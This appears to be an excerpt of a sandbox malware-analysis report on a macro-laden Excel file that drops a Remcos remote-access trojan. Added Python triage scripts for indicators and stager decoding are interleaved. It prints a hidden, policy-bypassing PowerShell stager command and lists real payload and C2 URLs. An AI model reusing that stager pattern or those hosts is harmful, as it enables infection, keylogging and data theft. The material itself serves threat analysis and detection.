                    Source: powershell.exe, 0000001E.00000002.588241264.0000000002551000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
                    Source: powershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                    Source: mshta.exe, 00000004.00000003.454576074.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453814399.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455070536.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455061023.0000000003E70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454904762.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://provit.uk/
                    Source: mshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://provit.uk/0
                    Source: mshta.exe, 00000004.00000003.454576074.0000000000405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454904762.00000000003E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453814399.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454904762.00000000003BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453814399.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453814399.0000000000442000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453814399.00000000003F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454904762.0000000000405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454576074.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.524670515.00000000000CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.524670515.00000000000EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.524670515.00000000000FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524379592.00000000000FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524379592.00000000000EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.524670515.000000000012F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524379592.000000000012F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522772525.00000000000FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522772525.00000000000EC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace
                    Source: mshta.exe, 00000004.00000002.454904762.00000000003E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lacek
                    Source: mshta.exe, 00000012.00000002.524670515.00000000000CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lacew
                    Source: mshta.exe, 00000012.00000002.524670515.00000000000CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&laceyX
                    Source: mshta.exe, 00000012.00000002.524670515.00000000000EC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace~
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://provit.uk/VQ
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
                    Source: mshta.exe, 00000004.00000003.454427910.0000000005CB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454213211.0000000003B70000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453457562.0000000004C7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455362300.0000000004C7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455101955.0000000003F2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453550721.0000000005CB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454198100.0000000004940000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455678281.0000000005CB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453622443.0000000005BE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454567306.0000000003F2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454219108.0000000003820000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453622443.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454375370.0000000003F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454320143.0000000005CB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453653166.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453653166.0000000005B11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453476331.0000000005C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454228756.0000000005800000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454264813.0000000005D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453637390.0000000005CC1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455663242.0000000005C78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.html-code-generator.com
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49169
                    Source: unknown | Network traffic detected: HTTP traffic on port 49163 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
                    Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49163
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49174
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49172
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49171
                    Source: unknown | Network traffic detected: HTTP traffic on port 49172 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49169 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49171 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49174 -> 443
                    Source: unknown | HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49165 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49171 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49172 version: TLS 1.2
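Most of the URL strings above are not indicators at all: the CRL, OCSP and CPS entries come from certificates in mshta.exe's memory, and the nuget.org and contoso.com strings are baked into the PowerShell runtime. What an analyst actually wants out of this list is the handful of candidate C2/payload URLs, with the memory-dump variants that differ only by one or two trailing garbage bytes (provit.uk/...&lace, &lacek, &laceyX; json.gp and json.gp/C) folded into one entry. The following is an added triage script, not Joe Sandbox tooling; the report lines it parses are constructed from the entries above with the memory-region identifiers shortened, and the noise lists are heuristics an analyst would tune for their own environment.

```python
"""Triage the URL and connection indicators from a Joe Sandbox 'Networking'
listing: separate likely C2/payload URLs from PKI and .NET runtime noise and
collapse memory-string variants that differ only by trailing garbage bytes.
Added example, not Joe Sandbox tooling."""
import re
from collections import defaultdict

# Constructed sample in the shape of the report's entries (dump IDs shortened).
SAMPLE_REPORT = """\
Source: mshta.exe, 00000004.00000002.455070536.0000000003EC3000.sdmp String found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaier=jagged&laceg
Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: CasPol.exe String found in binary or memory: http://geoplugin.net/json.gp
Source: CasPol.exe, 00000022.00000002.585780717.0000000000400000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 00000006.00000002.480662155.00000000034EE000.sdmp String found in binary or memory: http://go.micros
Source: powershell.exe, 00000006.00000002.489702897.0000000012161000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: mshta.exe, 00000004.00000003.454576074.000000000042F000.sdmp String found in binary or memory: https://provit.uk/
Source: mshta.exe, 00000012.00000003.524339714.000000000399C000.sdmp String found in binary or memory: https://provit.uk/0
Source: mshta.exe, 00000012.00000003.522772525.00000000000EC000.sdmp String found in binary or memory: https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace
Source: mshta.exe, 00000004.00000002.454904762.00000000003E1000.sdmp String found in binary or memory: https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lacek
Source: mshta.exe, 00000012.00000002.524670515.00000000000CA000.sdmp String found in binary or memory: https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&laceyX
Source: powershell.exe, 0000001E.00000002.588241264.0000000002551000.sdmp String found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
Source: unknown HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49165 version: TLS 1.2
"""

STRING_RE = re.compile(r"^Source:\s*([^,\s]+).*?String found in binary or memory:\s*(\S+)")
HTTPS_RE = re.compile(r"HTTPS traffic detected:\s*(\d+(?:\.\d+){3}):(\d+)\s*->\s*(\d+(?:\.\d+){3}):(\d+)")
URL_RE = re.compile(r"^(https?)://([^/?#:]+)(.*)$", re.I)

PKI_HOST_PREFIXES = ("crl.", "ocsp.")
PKI_PATH_HINTS = (".crl", "/cps")
# Hosts the .NET/PowerShell runtime carries in its own memory; never contacted by the sample.
RUNTIME_HOSTS = ("nuget.org", "contoso.com", "schemas.xmlsoap.org", "go.microsoft.com")


def classify_url(url):
    """Return 'pki', 'runtime' or 'candidate' for a URL string lifted from memory."""
    m = URL_RE.match(url)
    if not m:
        return "candidate"
    host, path = m.group(2).lower(), m.group(3).lower()
    if host.startswith(PKI_HOST_PREFIXES) or any(h in path for h in PKI_PATH_HINTS):
        return "pki"
    # Memory strings are often cut short ("http://go.micros"), so a host that is
    # a prefix of a known runtime host counts too.
    if any(host == r or host.endswith("." + r) or (len(host) >= 6 and r.startswith(host))
           for r in RUNTIME_HOSTS):
        return "runtime"
    return "candidate"


def collapse_variants(urls, slack=2):
    """Group URLs that differ only by up to `slack` trailing bytes (the garbage that
    follows an unterminated string in a dump). The shortest form becomes canonical."""
    canonical = {}
    for u in sorted(set(urls), key=lambda s: (len(s), s)):
        base = next((c for c in canonical if u.startswith(c) and len(u) - len(c) <= slack), None)
        if base is None:
            canonical[u] = []
        else:
            canonical[base].append(u)
    return canonical


def triage(report_text):
    """Parse report lines; return candidate URLs (with the processes that held them),
    the two noise classes, and the remote TLS endpoints actually observed on the wire."""
    by_class = defaultdict(list)
    processes = defaultdict(set)
    endpoints = set()
    for line in report_text.splitlines():
        line = line.strip()
        m = STRING_RE.match(line)
        if m:
            proc, url = m.group(1), m.group(2)
            by_class[classify_url(url)].append(url)
            processes[url].add(proc)
            continue
        m = HTTPS_RE.search(line)
        if m:
            endpoints.add((m.group(1), int(m.group(2))))
    candidates = collapse_variants(by_class["candidate"])
    return {
        "candidates": {u: sorted({p for v in [u, *vs] for p in processes[v]})
                       for u, vs in candidates.items()},
        "pki_noise": sorted(set(by_class["pki"])),
        "runtime_noise": sorted(set(by_class["runtime"])),
        "tls_endpoints": sorted(endpoints),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_REPORT)
    for url, procs in result["candidates"].items():
        print(f"{url}  <- {', '.join(procs)}")
    print("TLS endpoints:", result["tls_endpoints"])
```

Note that the first candidate still ends in `.htaier=jagged&laceg`: that string is two adjacent memory strings read as one (the `.hta` download URL followed by the tail of the provit.uk query), and no suffix heuristic should "repair" it. The dropped-file entry later in the report (`seethebestthignswhichgivingbestopportunities[1].hta`) is the evidence for where the real URL ends.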

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000 | 34_2_004099E4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Windows user hook set: 0 keyboard low level | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, | 34_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, | 34_2_00409B10
                    Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS
                    Source: Yara match | File source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 1260, type: MEMORYSTR

                    E-Banking Fraud

                    Source: Yara match | File source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000022.00000002.587134111.0000000000575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 1260, type: MEMORYSTR
                    Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_0041BB77 SystemParametersInfoW, | 34_2_0041BB77

                    System Summary

                    Source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 1712, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: CasPol.exe PID: 1260, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: pi-77159.xls | OLE: Microsoft Excel 2007+
                    Source: ~DFC4030D08E8153FBD.TMP.0.dr | OLE: Microsoft Excel 2007+
                    Source: 38630000.0.dr | OLE: Microsoft Excel 2007+
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswhichgivingbestopportunities[1].hta
                    Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
                    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
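The wscript.exe process-creation entry above is the whole second stage in one command line: a base64 literal is assigned to `$Codigo`, decoded with `[Convert]::FromBase64String`, and handed to a second powershell.exe launched with `-windowstyle hidden -executionpolicy bypass -NoProfile`. The variable names also change case between uses (`$Codigo`/`$codigo`, `$OWjuxd`/`$OWjuxD`), which PowerShell tolerates but which is the "case anomaly" several of the report's signatures key on. The following is an added triage helper for such command lines, not part of the report or of the malware. Because the report has the real literal removed, the sample command line below carries a constructed, benign stage-two script encoded the same way; the regexes are heuristics, and the switch abbreviations they accept (`-w`, `-ep`, `-nop`) are documented PowerShell short forms.

```python
"""Decode the wscript.exe -> powershell.exe stager pattern from a process-creation
command line: base64 literal assigned to a variable, decoded in-line, and run by a
nested hidden powershell.exe. Added example; the stage-two text is a constructed
benign placeholder, not the sample's real payload."""
import base64
import re

# Constructed stand-in for stage two. The real payload is not reproduced here.
STAGE2 = "$x = 'https://example.invalid/stage2'; Write-Output $x"
SAMPLE_CMDLINE = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -command '
    f"$Codigo = '{base64.b64encode(STAGE2.encode()).decode()}';"
    "$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));"
    "powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
)

B64_ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([A-Za-z0-9+/]{16,}={0,2})'")
VAR_RE = re.compile(r"\$(\w+)")
# (?<!\w) keeps "WindowsPowerShell" in the path from counting as an invocation.
PS_RE = re.compile(r"(?<!\w)powershell(?:\.exe)?\b", re.I)
FLAG_RES = {
    "hidden_window": re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I),
    "exec_policy_bypass": re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I),
    "no_profile": re.compile(r"-(?:nop|noprofile)\b", re.I),
}


def decode_b64_literals(cmdline):
    """Return {variable: decoded text} for every base64 literal assigned on the line.
    This stager names UTF8.GetString; -EncodedCommand style lines are UTF-16LE."""
    utf16 = re.search(r"::Unicode\.GetString|-(?:e|ec|enc|encodedcommand)\s", cmdline, re.I)
    out = {}
    for name, literal in B64_ASSIGN_RE.findall(cmdline):
        if len(literal) % 4:
            continue  # not a complete base64 string, leave it alone
        raw = base64.b64decode(literal)
        out[name] = raw.decode("utf-16le" if utf16 else "utf-8", errors="replace")
    return out


def invocation_flags(cmdline):
    """Count powershell invocations on the line and flag the hiding/bypass switches."""
    report = {"invocations": len(PS_RE.findall(cmdline))}
    for key, rx in FLAG_RES.items():
        report[key] = bool(rx.search(cmdline))
    return report


def case_anomalies(cmdline):
    """PowerShell variable names are case-insensitive, so $Codigo and $codigo are the
    same variable; mixed spellings of one name are a hand-obfuscation tell."""
    spellings = {}
    for name in VAR_RE.findall(cmdline):
        spellings.setdefault(name.lower(), set()).add(name)
    return sorted(sorted(s) for s in spellings.values() if len(s) > 1)


def triage_cmdline(cmdline):
    """Full triage record for one process-creation command line."""
    return {
        "stages": decode_b64_literals(cmdline),
        "flags": invocation_flags(cmdline),
        "case_anomalies": case_anomalies(cmdline),
    }


if __name__ == "__main__":
    rec = triage_cmdline(SAMPLE_CMDLINE)
    for var, text in rec["stages"].items():
        print(f"${var} decodes to: {text}")
    print(rec["flags"], rec["case_anomalies"])
```

Two invocations on one line, with the second one hidden and policy-bypassing, is the shape to alert on regardless of what the literal decodes to; the decoded text is what you hand to the next analyst, since in this chain it is where the filemail.com download seen in the Networking section would appear.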
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_000007FE89B000DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_0041D071
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_004520D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_0043D098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00437150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_004361AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00426254
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00431377
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_0043651C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_0041E5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_0044C739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_004367C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_004267CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_0043C9DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00432A49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00436A8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_0043CC0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00436D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00434D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00426E73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00440E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_0043CE3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00412F45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00452F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00426FAD
Source: pi-77159.xls | OLE indicator, VBA macros: true
Source: pi-77159.xls | Stream path 'MBD00322250/\x1Ole' : https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lacedHGHt9#nBY=B02>UE;,1d7Kc*NEHaN%XT}fXu[mJLhZ&AzQpO-#:)K4nyJNPV06Wc8x5pybgZ01BKUfO9TgvA5l7w5NFcJh7jfHYCoIraLoYI0)rx{y]{wYXYgqw{"
Source: 38630000.0.dr | Stream path 'MBD00322250/\x1Ole' : https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lacedHGHt9#nBY=B02>UE;,1d7Kc*NEHaN%XT}fXu[mJLhZ&AzQpO-#:)K4nyJNPV06Wc8x5pybgZ01BKUfO9TgvA5l7w5NFcJh7jfHYCoIraLoYI0)rx{y]{wYXYgqw{"
Source: ~DFC4030D08E8153FBD.TMP.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 00401F66 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 004020E7 appears 39 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 004338A5 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 00433FB0 appears 55 times
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
